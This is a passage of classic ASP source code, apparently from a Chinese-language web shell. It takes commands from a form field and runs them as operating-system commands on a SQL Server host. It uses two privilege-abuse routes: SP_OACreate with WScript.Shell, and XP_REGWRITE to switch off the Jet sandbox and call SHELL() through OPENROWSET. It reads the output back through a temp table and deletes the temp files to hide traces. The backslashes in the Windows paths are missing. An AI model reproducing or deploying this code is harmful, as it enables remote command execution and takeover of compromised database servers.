SET RECRESULT = NOTHING
RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
RESPONSE.WRITE "利用"&REQUEST("TOOL")&"扩展执行"
RESPONSE.WRITE REQUEST.FORM("CMD")
RESPONSE.WRITE STRRESULT
RESPONSE.WRITE "</TEXTAREA>"
END IF
ELSEIF REQUEST("TOOL")="SP_OACreate" THEN
SET ADOCONN=SERVER.CreateOBJECT("ADODB.CONNECTION")
ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
IF REQUEST.FORM("CMD")<>"" THEN
STRQUERY = "Create TABLE [JNC](RESULTTXT NVARCHAR(1024) NULL);USE MASTER DECLARE @O INT EXEC SP_OACreate 'WSCRIPT.SHELL',@O OUT EXEC SP_OAMETHOD @O,'RUN',NULL,'CMD /C "&REQUEST("CMD")&" > 8617.TMP',0,TRUE;BULK Insert [JNC] FROM '8617.TMP' WITH (KEEPNULLS);"
ADOCONN.EXECUTE(STRQUERY)
STRQUERY = "Select * FROM JNC"
SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
IF NOT RECRESULT.EOF THEN
DO WHILE NOT RECRESULT.EOF
STRRESULT = STRRESULT & CHR(13) & RECRESULT(0)
RECRESULT.MOVENEXT
LOOP
END IF
SET RECRESULT = NOTHING
RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
RESPONSE.WRITE "利用"&REQUEST("TOOL")&"扩展执行"
RESPONSE.WRITE REQUEST.FORM("CMD")
RESPONSE.WRITE STRRESULT
RESPONSE.WRITE "</TEXTAREA>"
STRQUERY = "Drop TABLE [JNC];DECLARE @O INT EXEC SP_OACreate 'WSCRIPT.SHELL',@O OUT EXEC SP_OAMETHOD @O,'RUN',NULL,'CMD /C DEL 8617.TMP'"
ADOCONN.EXECUTE(STRQUERY)
END IF
ELSEIF REQUEST("TOOL")="XP_REGWRITE" THEN
IF SESSION("SYSTEM")="2000" THEN
PATH="C:WINNTSYSTEM32IASIAS.MDB"
ELSE
PATH="C:WINDOWSSYSTEM32IASIAS.MDB"
END IF
SET ADOCONN=SERVER.CreateOBJECT("ADODB.CONNECTION")
ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
IF REQUEST.FORM("CMD")<>"" THEN
CMD=CHR(34)&"CMD.EXE /C "&REQUEST.FORM("CMD")&" > 8617.TMP"&CHR(34)
STRQUERY = "Create TABLE [JNC](RESULTTXT NVARCHAR(1024) NULL);EXEC MASTER..XP_REGWRITE 'HKEY_LOCAL_MACHINE','SOFTWAREMICROSOFTJET4.0ENGINES','SANDBOXMODE','REG_DWORD',0;Select * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0',';DATABASE=" & PATH &"','Select SHELL("&CMD&")');"
ADOCONN.EXECUTE(STRQUERY)
STRQUERY = "Select * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0',';DATABASE=" & PATH &"','Select SHELL("&CHR(34)&"CMD.EXE /C COPY 8617.TMP JNC.TMP"&CHR(34)&")');BULK Insert [JNC] FROM 'JNC.TMP' WITH (KEEPNULLS);"
SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
STRQUERY="Select * FROM [JNC];"
SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
IF NOT RECRESULT.EOF THEN
DO WHILE NOT RECRESULT.EOF
STRRESULT = STRRESULT & CHR(13) & RECRESULT(0)
RECRESULT.MOVENEXT
LOOP
END IF
SET RECRESULT = NOTHING
RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
RESPONSE.WRITE "利用"&REQUEST("TOOL")&"扩展执行"
RESPONSE.WRITE REQUEST.FORM("CMD")
RESPONSE.WRITE STRRESULT
RESPONSE.WRITE "</TEXTAREA>"
